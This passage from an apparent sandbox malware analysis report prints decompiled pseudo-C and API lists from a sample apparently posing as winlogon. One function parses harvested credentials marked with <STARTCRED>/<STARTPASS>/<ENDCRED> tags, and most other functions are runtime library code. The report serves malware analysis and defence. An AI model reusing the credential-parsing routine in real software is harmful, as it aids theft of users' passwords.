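])
```

    Empty fields pass the checks (the listing skips the character walk when the length is zero), so an empty password record is accepted; the rejected records are still reported, since a credential the sample refused to use is still a credential the attacker held.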
    C-Code - Quality: 90%
    			E00D636A0(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v68;
    				intOrPtr _v72;
    				char _v92;
    				char _v348;
    				char _v604;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				intOrPtr _v616;
    				signed int _t59;
    				signed int _t60;
    				intOrPtr _t73;
    				intOrPtr _t74;
    				short* _t81;
    				short* _t83;
    				void* _t103;
    				intOrPtr _t104;
    				intOrPtr _t114;
    				void* _t118;
    				void* _t119;
    				char _t126;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				void* _t131;
    				intOrPtr _t133;
    				signed int _t134;
    				void* _t135;
    				void* _t136;
    
    				_t121 = __edx;
    				_push(0xffffffff);
    				_push(E00D7E1F8);
    				_push( *[fs:0x0]);
    				_t136 = _t135 - 0x25c;
    				_t59 =  *0xd88004; // 0x276b9783
    				_t60 = _t59 ^ _t134;
    				_v20 = _t60;
    				_push(__edi);
    				_push(_t60);
    				 *[fs:0x0] =  &_v16;
    				_v616 = __ecx;
    				if(__ecx == 0 || __edx == 0) {
    					goto L28;
    				} else {
    					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx));
    					E00D67980( &_v92, __edi, __edx);
    					_v8 = 0;
    					_t126 = 0;
    					while(1) {
    						_t103 = E00D67E20( &_v92, L"<STARTCRED>", _t126, 0xb);
    						_t131 = E00D67E20( &_v92, L"<STARTPASS>", _t126, 0xb);
    						_t127 = E00D67E20( &_v92, L"<ENDCRED>", _t126, 9);
    						if(_t103 == 0xffffffff || _t131 == 0xffffffff || _t127 == 0xffffffff || _t103 >= _t131 || _t131 >= _t127) {
    							break;
    						}
    						_t73 =  *0xd85d6c; // 0xb
    						_t114 =  *0xd85d70; // 0xb
    						_v608 = _t127;
    						_t121 = _t131 - _t114 - _t103;
    						_v608 = _v608 - _t73;
    						_v608 = _v608 - _t131;
    						_t74 =  *0xd85d68; // 0x9
    						_v612 = _t74 + _t127;
    						E00D67900( &_v92,  &_v68, _t114 + _t103, _t131 - _t114 - _t103);
    						_v8 = 1;
    						E00D67900( &_v92,  &_v44, _t131 + _t73, _v608);
    						_v8 = 2;
    						_t104 = _v48;
    						_t128 = _v52;
    						_t81 =  >=  ? _v68 :  &_v68;
    						_t118 = 0;
    						if(_t128 == 0) {
    							L11:
    							_t133 = _v24;
    							_t121 = _v28;
    							_t83 =  >=  ? _v44 :  &_v44;
    							_t119 = 0;
    							if(_t121 == 0) {
    								L15:
    								if(_v608 >= 0x20 || _t128 >= 0x100 || _t121 >= 0x100) {
    									L20:
    									if(_t133 >= 8) {
    										_t44 = _t133 + 1; // 0x8
    										E00D682E0(_t104, _t121, _t128, _v44, _t44);
    										_t104 = _v48;
    									}
    									_t126 = _v612;
    									_v24 = 7;
    									_v28 = 0;
    									_v44 = 0;
    									_v8 = 0;
    									if(_t104 >= 8) {
    										E00D682E0(_t104, _t121, _t126, _v68, _t104 + 1);
    									}
    									continue;
    								} else {
    									E00D6D520(_t128,  &_v604, 0, 0x200);
    									_t92 =  >=  ? _v68 :  &_v68;
    									E00D6EAB8( &_v604,  >=  ? _v68 :  &_v68, 0xff);
    									_t96 =  >=  ? _v44 :  &_v44;
    									E00D6EAB8( &_v348,  >=  ? _v44 :  &_v44, 0xff);
    									_t136 = _t136 + 0x24;
    									E00D62540(_t104, _v616, _t128,  &_v604);
    									_t104 = _v48;
    									L19:
    									_t133 = _v24;
    									goto L20;
    								}
    							}
    							while( *_t83 >= 0x20) {
    								_t119 = _t119 + 1;
    								_t83 = _t83 + 2;
    								if(_t119 < _t121) {
    									continue;
    								}
    								goto L15;
    							}
    							goto L20;
    						}
    						while( *_t81 >= 0x20) {
    							_t118 = _t118 + 1;
    							_t81 = _t81 + 2;
    							if(_t118 < _t128) {
    								continue;
    							}
    							goto L11;
    						}
    						goto L19;
    					}
    					_t69 = _v72;
    					if(_v72 >= 8) {
    						E00D682E0(_t103, _t121, _t127, _v92, _t69 + 1);
    					}
    					L28:
    					 *[fs:0x0] = _v16;
    					return E00D6ABE4(_v20 ^ _t134);
    				}
    			}

    APIs
    • __Stoull.NTSTC_LIBCMT ref: 00D63855
    • __Stoull.NTSTC_LIBCMT ref: 00D63872
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 73%
    			E00D72D35(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				signed char _v15;
    				char _v16;
    				void _v24;
    				short _v28;
    				char _v31;
    				void _v32;
    				long _v36;
    				intOrPtr _v40;
    				void* _v44;
    				signed int _v48;
    				signed char* _v52;
    				long _v56;
    				int _v60;
    				signed int _t78;
    				signed int _t80;
    				int _t86;
    				void* _t94;
    				long _t97;
    				void _t105;
    				void* _t112;
    				signed int _t116;
    				signed int _t118;
    				signed char _t123;
    				signed char _t128;
    				intOrPtr _t129;
    				signed int _t131;
    				signed char* _t133;
    				intOrPtr* _t135;
    				signed int _t136;
    				void* _t137;
    
    				_t78 =  *0xd88004; // 0x276b9783
    				_v8 = _t78 ^ _t136;
    				_t80 = _a8;
    				_t118 = _t80 >> 6;
    				_t116 = (_t80 & 0x0000003f) * 0x30;
    				_t133 = _a12;
    				_v52 = _t133;
    				_v48 = _t118;
    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd91260 + _t118 * 4)) + _t116 + 0x18));
    				_v40 = _a16 + _t133;
    				_t86 = GetConsoleCP();
    				_t135 = _a4;
    				_v60 = _t86;
    				 *_t135 = 0;
    				 *((intOrPtr*)(_t135 + 4)) = 0;
    				 *((intOrPtr*)(_t135 + 8)) = 0;
    				while(_t133 < _v40) {
    					_v28 = 0;
    					_v31 =  *_t133;
    					_t129 =  *((intOrPtr*)(0xd91260 + _v48 * 4));
    					_t123 =  *(_t129 + _t116 + 0x2d);
    					if((_t123 & 0x00000004) == 0) {
    						if(( *(E00D76F28(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
    							_push(1);
    							_push(_t133);
    							goto L8;
    						} else {
    							if(_t133 >= _v40) {
    								_t131 = _v48;
    								 *((char*)( *((intOrPtr*)(0xd91260 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
    								 *( *((intOrPtr*)(0xd91260 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xd91260 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
    							} else {
    								_t112 = E00D73BE9( &_v28, _t133, 2);
    								_t137 = _t137 + 0xc;
    								if(_t112 != 0xffffffff) {
    									_t133 =  &(_t133[1]);
    									goto L9;
    								}
    							}
    						}
    					} else {
    						_t128 = _t123 & 0x000000fb;
    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
    						_push(2);
    						_v15 = _t128;
    						 *(_t129 + _t116 + 0x2d) = _t128;
    						_push( &_v16);
    						L8:
    						_push( &_v28);
    						_t94 = E00D73BE9();
    						_t137 = _t137 + 0xc;
    						if(_t94 != 0xffffffff) {
    							L9:
    							_t133 =  &(_t133[1]);
    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
    							_v56 = _t97;
    							if(_t97 != 0) {
    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
    									L19:
    									 *_t135 = GetLastError();
    								} else {
    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
    									if(_v36 >= _v56) {
    										if(_v31 != 0xa) {
    											goto L16;
    										} else {
    											_t105 = 0xd;
    											_v32 = _t105;
    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
    												goto L19;
    											} else {
    												if(_v36 >= 1) {
    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
    													goto L16;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					goto L20;
    					L16:
    				}
    				L20:
    				return E00D6ABE4(_v8 ^ _t136);
    			}

    APIs
    • GetConsoleCP.KERNEL32 ref: 00D72D77
    • __Stoull.NTSTC_LIBCMT ref: 00D72DF2
    • __Stoull.NTSTC_LIBCMT ref: 00D72E0D
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00D72E33
    • WriteFile.KERNEL32(?,?,00000000,00D734AA,00000000), ref: 00D72E52
    • WriteFile.KERNEL32(?,?,00000001,00D734AA,00000000), ref: 00D72E8B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00D734AA,?,?,?,?,?,?), ref: 00D72ECD
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 64%
    			E00D6B9C0(void* __ebx, void* __edi, void* __esi, char* _a4) {
    				int _v8;
    				signed int _v12;
    				char _v20;
    				short* _v28;
    				signed int _v32;
    				short* _v36;
    				int _v40;
    				int _v44;
    				void* _v60;
    				signed int _t23;
    				signed int _t24;
    				char _t26;
    				int _t27;
    				void* _t29;
    				short* _t30;
    				int _t31;
    				signed short _t36;
    				signed short _t40;
    				char* _t45;
    				int _t46;
    				char* _t48;
    				char* _t54;
    				int _t56;
    				short* _t59;
    				signed int _t61;
    				void* _t62;
    				short* _t63;
    
    				_push(0xfffffffe);
    				_push(0xd86878);
    				_push(E00D6D240);
    				_push( *[fs:0x0]);
    				_t63 = _t62 - 0x18;
    				_t23 =  *0xd88004; // 0x276b9783
    				_v12 = _v12 ^ _t23;
    				_t24 = _t23 ^ _t61;
    				_v32 = _t24;
    				_push(_t24);
    				 *[fs:0x0] =  &_v20;
    				_v28 = _t63;
    				_t45 = _a4;
    				if(_t45 != 0) {
    					_t48 = _t45;
    					_t7 =  &(_t48[1]); // 0xd64854
    					_t54 = _t7;
    					do {
    						_t26 =  *_t48;
    						_t48 =  &(_t48[1]);
    					} while (_t26 != 0);
    					_t8 = _t48 - _t54 + 1; // 0xd64855
    					_t27 = _t8;
    					_v44 = _t27;
    					if(_t27 > 0x7fffffff) {
    						_t27 = E00D6B9A0(0x80070057);
    					}
    					_t56 = MultiByteToWideChar(0, 0, _t45, _t27, 0, 0);
    					_v40 = _t56;
    					if(_t56 == 0) {
    						_t40 = GetLastError();
    						if(_t40 > 0) {
    							_t40 = _t40 & 0x0000ffff | 0x80070000;
    						}
    						E00D6B9A0(_t40);
    					}
    					_v8 = 0;
    					_t29 = _t56 + _t56;
    					if(_t56 >= 0x1000) {
    						_push(_t29);
    						_t30 = E00D702C9(_t49);
    						_t63 =  &(_t63[2]);
    						_t59 = _t30;
    						_v36 = _t59;
    						_v8 = 0xfffffffe;
    					} else {
    						E00D7D520();
    						_v28 = _t63;
    						_t59 = _t63;
    						_v36 = _t59;
    						_v8 = 0xfffffffe;
    					}
    					if(_t59 == 0) {
    						E00D6B9A0(0x8007000e);
    					}
    					_t31 = MultiByteToWideChar(0, 0, _t45, _v44, _t59, _t56);
    					if(_t31 == 0) {
    						if(_t56 >= 0x1000) {
    							E00D7009A(_t59);
    							_t63 =  &(_t63[2]);
    						}
    						_t36 = GetLastError();
    						if(_t36 > 0) {
    							_t36 = _t36 & 0x0000ffff | 0x80070000;
    						}
    						_t31 = E00D6B9A0(_t36);
    					}
    					__imp__#2(_t59);
    					_t46 = _t31;
    					if(_t56 >= 0x1000) {
    						E00D7009A(_t59);
    					}
    					if(_t46 == 0) {
    						E00D6B9A0(0x8007000e);
    					}
    				} else {
    				}
    				 *[fs:0x0] = _v20;
    				return E00D6ABE4(_v32 ^ _t61);
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,00D64855,00000000,00000000,276B9783,00000000,00000000,76FD3F8A,Function_0000D240,00D86878,000000FE,?,00D64853,WQL), ref: 00D6BA3A
    • GetLastError.KERNEL32(?,00D64853,WQL,?,?), ref: 00D6BA49
    • __alloca_probe_16.NTDLLP ref: 00D6BA73
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,?,00000000,00000000,?,?,?,?,?,00D64853), ref: 00D6BAD3
    • GetLastError.KERNEL32(?,?,?,?,?,00D64853), ref: 00D6BAEE
    • SysAllocString.OLEAUT32(00000000), ref: 00D6BB07
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D70D5E,00000003,?,00D70CFE,00000003,00D86AA8,0000000C,00D70E11,00000003,00000002), ref: 00D70D89
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,00D70D5E,00000003,?,00D70CFE,00000003,00D86AA8,0000000C,00D70E11,00000003,00000002), ref: 00D70D9C
    • FreeLibrary.KERNEL32(00000000,?,?,?,00D70D5E,00000003,?,00D70CFE,00000003,00D86AA8,0000000C,00D70E11,00000003,00000002,00000000), ref: 00D70DBF
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 77%
    			E00D75819(signed int _a4, void* _a8, unsigned int _a12) {
    				signed int _v5;
    				char _v6;
    				void* _v12;
    				unsigned int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				void* _v32;
    				long _v36;
    				void* _v40;
    				long _v44;
    				signed int* _t143;
    				signed int _t145;
    				intOrPtr _t149;
    				signed int _t153;
    				signed int _t155;
    				signed char _t157;
    				unsigned int _t158;
    				intOrPtr _t162;
    				void* _t163;
    				signed int _t164;
    				signed int _t167;
    				long _t168;
    				intOrPtr _t175;
    				signed int _t176;
    				intOrPtr _t178;
    				signed int _t180;
    				signed int _t184;
    				char _t191;
    				char* _t192;
    				char _t199;
    				char* _t200;
    				signed char _t211;
    				signed int _t213;
    				long _t215;
    				signed int _t216;
    				char _t218;
    				signed char _t222;
    				signed int _t223;
    				unsigned int _t224;
    				intOrPtr _t225;
    				unsigned int _t229;
    				signed int _t231;
    				signed int _t232;
    				signed int _t233;
    				signed int _t234;
    				signed int _t235;
    				signed char _t236;
    				signed int _t237;
    				signed int _t239;
    				signed int _t240;
    				signed int _t241;
    				signed int _t242;
    				signed int _t246;
    				void* _t248;
    				void* _t249;
    
    				_t213 = _a4;
    				if(_t213 != 0xfffffffe) {
    					__eflags = _t213;
    					if(_t213 < 0) {
    						L58:
    						_t143 = E00D7210F();
    						 *_t143 =  *_t143 & 0x00000000;
    						__eflags =  *_t143;
    						 *((intOrPtr*)(E00D72122())) = 9;
    						L59:
    						_t145 = E00D70269();
    						goto L60;
    					}
    					__eflags = _t213 -  *0xd91460; // 0x40
    					if(__eflags >= 0) {
    						goto L58;
    					}
    					_v24 = 1;
    					_t239 = _t213 >> 6;
    					_t235 = (_t213 & 0x0000003f) * 0x30;
    					_v20 = _t239;
    					_t149 =  *((intOrPtr*)(0xd91260 + _t239 * 4));
    					_v28 = _t235;
    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
    					_v5 = _t222;
    					__eflags = _t222 & 0x00000001;
    					if((_t222 & 0x00000001) == 0) {
    						goto L58;
    					}
    					_t223 = _a12;
    					__eflags = _t223 - 0x7fffffff;
    					if(_t223 <= 0x7fffffff) {
    						__eflags = _t223;
    						if(_t223 == 0) {
    							L57:
    							return 0;
    						}
    						__eflags = _v5 & 0x00000002;
    						if((_v5 & 0x00000002) != 0) {
    							goto L57;
    						}
    						__eflags = _a8;
    						if(_a8 == 0) {
    							goto L6;
    						}
    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
    						_v5 = _t153;
    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
    						_t246 = 0;
    						_t155 = _t153 - 1;
    						__eflags = _t155;
    						if(_t155 == 0) {
    							_t236 = _v24;
    							_t157 =  !_t223;
    							__eflags = _t236 & _t157;
    							if((_t236 & _t157) != 0) {
    								_t158 = 4;
    								_t224 = _t223 >> 1;
    								_v16 = _t158;
    								__eflags = _t224 - _t158;
    								if(_t224 >= _t158) {
    									_t158 = _t224;
    									_v16 = _t224;
    								}
    								_t246 = E00D717FF(_t224, _t158);
    								E00D717C5(0);
    								E00D717C5(0);
    								_t249 = _t248 + 0xc;
    								_v12 = _t246;
    								__eflags = _t246;
    								if(_t246 != 0) {
    									_t162 = E00D75316(_t213, 0, 0, _v24);
    									_t225 =  *((intOrPtr*)(0xd91260 + _t239 * 4));
    									_t248 = _t249 + 0x10;
    									_t240 = _v28;
    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
    									_t163 = _t246;
    									 *(_t240 + _t225 + 0x24) = _t236;
    									_t235 = _t240;
    									_t223 = _v16;
    									L21:
    									_t241 = 0;
    									_v40 = _t163;
    									_t215 =  *((intOrPtr*)(0xd91260 + _v20 * 4));
    									_v36 = _t215;
    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
    									_t216 = _a4;
    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
    										_v6 = _t218;
    										__eflags = _t218 - 0xa;
    										_t216 = _a4;
    										if(_t218 != 0xa) {
    											__eflags = _t223;
    											if(_t223 != 0) {
    												_t241 = _v24;
    												 *_t163 = _v6;
    												_t216 = _a4;
    												_t232 = _t223 - 1;
    												__eflags = _v5;
    												_v12 = _t163 + 1;
    												_v16 = _t232;
    												 *((char*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2a)) = 0xa;
    												if(_v5 != 0) {
    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2b));
    													_v6 = _t191;
    													__eflags = _t191 - 0xa;
    													if(_t191 != 0xa) {
    														__eflags = _t232;
    														if(_t232 != 0) {
    															_t192 = _v12;
    															_t241 = 2;
    															 *_t192 = _v6;
    															_t216 = _a4;
    															_t233 = _t232 - 1;
    															_v12 = _t192 + 1;
    															_v16 = _t233;
    															 *((char*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2b)) = 0xa;
    															__eflags = _v5 - _v24;
    															if(_v5 == _v24) {
    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2c));
    																_v6 = _t199;
    																__eflags = _t199 - 0xa;
    																if(_t199 != 0xa) {
    																	__eflags = _t233;
    																	if(_t233 != 0) {
    																		_t200 = _v12;
    																		_t241 = 3;
    																		 *_t200 = _v6;
    																		_t216 = _a4;
    																		_t234 = _t233 - 1;
    																		__eflags = _t234;
    																		_v12 = _t200 + 1;
    																		_v16 = _t234;
    																		 *((char*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2c)) = 0xa;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									_t164 = E00D78F9E(_t216);
    									__eflags = _t164;
    									if(_t164 == 0) {
    										L41:
    										_v24 = 0;
    										L42:
    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
    										__eflags = _t167;
    										if(_t167 == 0) {
    											L53:
    											_t168 = GetLastError();
    											_t241 = 5;
    											__eflags = _t168 - _t241;
    											if(_t168 != _t241) {
    												__eflags = _t168 - 0x6d;
    												if(_t168 != 0x6d) {
    													L37:
    													E00D720EC(_t168);
    													goto L38;
    												}
    												_t242 = 0;
    												goto L39;
    											}
    											 *((intOrPtr*)(E00D72122())) = 9;
    											 *(E00D7210F()) = _t241;
    											goto L38;
    										}
    										_t229 = _a12;
    										__eflags = _v36 - _t229;
    										if(_v36 > _t229) {
    											goto L53;
    										}
    										_t242 = _t241 + _v36;
    										__eflags = _t242;
    										L45:
    										_t237 = _v28;
    										_t175 =  *((intOrPtr*)(0xd91260 + _v20 * 4));
    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
    											__eflags = _v5 - 2;
    											if(_v5 == 2) {
    												__eflags = _v24;
    												_push(_t242 >> 1);
    												_push(_v40);
    												_push(_t216);
    												if(_v24 == 0) {
    													_t176 = E00D75488();
    												} else {
    													_t176 = E00D75798();
    												}
    											} else {
    												_t230 = _t229 >> 1;
    												__eflags = _t229 >> 1;
    												_t176 = E00D75648(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
    											}
    											_t242 = _t176;
    										}
    										goto L39;
    									}
    									_t231 = _v28;
    									_t178 =  *((intOrPtr*)(0xd91260 + _v20 * 4));
    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
    										goto L41;
    									}
    									_t180 = GetConsoleMode(_v32,  &_v44);
    									__eflags = _t180;
    									if(_t180 == 0) {
    										goto L41;
    									}
    									__eflags = _v5 - 2;
    									if(_v5 != 2) {
    										goto L42;
    									}
    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
    									__eflags = _t184;
    									if(_t184 != 0) {
    										_t229 = _a12;
    										_t242 = _t241 + _v36 * 2;
    										goto L45;
    									}
    									_t168 = GetLastError();
    									goto L37;
    								} else {
    									 *((intOrPtr*)(E00D72122())) = 0xc;
    									 *(E00D7210F()) = 8;
    									L38:
    									_t242 = _t241 | 0xffffffff;
    									__eflags = _t242;
    									L39:
    									E00D717C5(_t246);
    									return _t242;
    								}
    							}
    							L15:
    							 *(E00D7210F()) =  *_t206 & _t246;
    							 *((intOrPtr*)(E00D72122())) = 0x16;
    							E00D70269();
    							goto L38;
    						}
    						__eflags = _t155 != 1;
    						if(_t155 != 1) {
    							L13:
    							_t163 = _a8;
    							_v16 = _t223;
    							_v12 = _t163;
    							goto L21;
    						}
    						_t211 =  !_t223;
    						__eflags = _t211 & 0x00000001;
    						if((_t211 & 0x00000001) == 0) {
    							goto L15;
    						}
    						goto L13;
    					}
    					L6:
    					 *(E00D7210F()) =  *_t151 & 0x00000000;
    					 *((intOrPtr*)(E00D72122())) = 0x16;
    					goto L59;
    				} else {
    					 *(E00D7210F()) =  *_t212 & 0x00000000;
    					_t145 = E00D72122();
    					 *_t145 = 9;
    					L60:
    					return _t145 | 0xffffffff;
    				}
    			}

    APIs
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
      • Part of subcall function 00D717C5: HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    • GetConsoleMode.KERNEL32(?,?), ref: 00D75AA7
    • ReadConsoleW.KERNEL32(?,?,00000000,?,00000000), ref: 00D75AC9
    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 00D75AD3
    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D75B11
      • Part of subcall function 00D75488: ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00D75568
      • Part of subcall function 00D75648: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00000000,?,?,00000000,00D78A99), ref: 00D75755
      • Part of subcall function 00D75648: GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00D78A99,?,?,?,?,00000000,00000000), ref: 00D75761
    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 00D75B75
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 96%
    			E00D6E837(void* __ebx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				int _v20;
    				int _v24;
    				char* _v28;
    				int _v32;
    				char _v36;
    				intOrPtr _v44;
    				char _v48;
    				signed int _t59;
    				char* _t61;
    				intOrPtr _t63;
    				int _t64;
    				intOrPtr* _t65;
    				signed int _t68;
    				intOrPtr* _t71;
    				short* _t73;
    				int _t74;
    				int _t76;
    				char _t78;
    				short* _t83;
    				short _t85;
    				int _t91;
    				int _t93;
    				char* _t98;
    				int _t103;
    				char* _t105;
    				void* _t106;
    				intOrPtr _t108;
    				intOrPtr _t109;
    				int _t110;
    				short* _t113;
    				int _t114;
    				int _t116;
    				signed int _t117;
    
    				_t59 =  *0xd88004; // 0x276b9783
    				_v8 = _t59 ^ _t117;
    				_t61 = _a4;
    				_t91 = _a12;
    				_t116 = 0;
    				_v28 = _t61;
    				_v20 = 0;
    				_t113 = _a8;
    				_v24 = _t113;
    				if(_t61 == 0 || _t91 != 0) {
    					if(_t113 != 0) {
    						E00D6E412(_t91,  &_v48, _t106, _a16);
    						_t98 = _v28;
    						if(_t98 == 0) {
    							_t63 = _v44;
    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
    								_t51 = _t63 + 8; // 0xd86a68
    								_t64 = WideCharToMultiByte( *_t51, _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
    								if(_t64 == 0 || _v20 != _t116) {
    									L55:
    									_t65 = E00D72122();
    									_t114 = _t113 | 0xffffffff;
    									 *_t65 = 0x2a;
    									goto L56;
    								} else {
    									_t53 = _t64 - 1; // -1
    									_t114 = _t53;
    									L56:
    									if(_v36 != 0) {
    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
    									}
    									goto L59;
    								}
    							}
    							_t68 =  *_t113 & 0x0000ffff;
    							if(_t68 == 0) {
    								L51:
    								_t114 = _t116;
    								goto L56;
    							}
    							while(_t68 <= 0xff) {
    								_t113 =  &(_t113[1]);
    								_t116 = _t116 + 1;
    								_t68 =  *_t113 & 0x0000ffff;
    								if(_t68 != 0) {
    									continue;
    								}
    								goto L51;
    							}
    							goto L55;
    						}
    						_t108 = _v44;
    						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
    							if( *((intOrPtr*)(_t108 + 4)) != 1) {
    								_t26 = _t108 + 8; // 0xd86a68
    								_t114 = WideCharToMultiByte( *_t26, _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
    								if(_t114 == 0) {
